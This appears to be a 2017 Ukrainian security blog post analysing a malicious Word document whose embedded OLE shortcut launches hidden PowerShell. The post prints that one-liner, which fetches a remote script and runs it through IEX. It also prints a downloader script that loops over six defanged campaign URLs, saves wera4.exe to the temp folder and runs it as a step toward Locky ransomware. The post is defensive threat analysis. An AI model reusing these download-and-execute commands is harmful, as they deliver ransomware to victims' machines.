Archive | 07/11/2017

%random%.doc > OLE(ps) > wera4.exe

Отримав на аналіз черговий зразок документу із OLE у вигляді ярлика на powershell.

Незважаючи на той факт, що даний зразок не був націлений на українські системи – в котре наголошую, що через певний час тактику застосування таких документів (тільки локалізованих та з іншими зображеннями) візьмуть на озброєння зловмисники, що будуть атакувати українські організації. Тому, будьте ласкаві, перевірте ще раз  – чи вжили ви необхідних заходів, аби активація такої приманки не залежала від людського фактору і була блокована одним із наведених методів у розділі “Контрзаходи”

Навіть зображення не змінили:

При активації в %temp% записується 4.lnk який містить такий рядок:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "$rv=[System.Uri]'h11p:\\with-hair[.]co.jp/693';$dx=(new-object IO.StreamReader((([Net.WebRequest]::Create($rv)).GetResponse()).GetResponseStream())).ReadToEnd();IEX $dx;"

Якщо жертва активує вбудований об’єкт процес Winword передає керування на powershell, що призводить до отримання списку адрес (необфускований)

Перелік із 6 URL по даній кампанії (завантаження проміжного payload який довантажує Locky)

$cpknos = "h11p:\\teesaddiction[.]com/JHgd3Dees","h11p:\\christaminiatures[.]nl/JHgd3Dees","h11p:\\336.linux1.testsider[.]dk/JHgd3Dees","h11p:\\florastor[.]net/JHgd3Dees","h11p:\\heinzig[.]info/JHgd3Dees","h11p:\\muchinfaket[.]net/p66/JHgd3Dees"
$cpknos = $cpknos | Sort-Object {Get-Random}
foreach($cpkno in $cpknos){
Try{
Write-Host $cpkno
$scpm = "$env:temp\wera4.exe"
Write-Host $scpm
$dum = (New-Object System[.]net.WebClient)
$dum.DownloadFile([System.Uri]$cpkno, $scpm)
Start-Process $scpm
break
}Catch{}}

Результат активації

Dropper та проміжний payload детектуються McAfee

Контрзаходи:

(такі самі як у попередньому аналізі)

Будьте уважні та обережні!

VR
Advertisements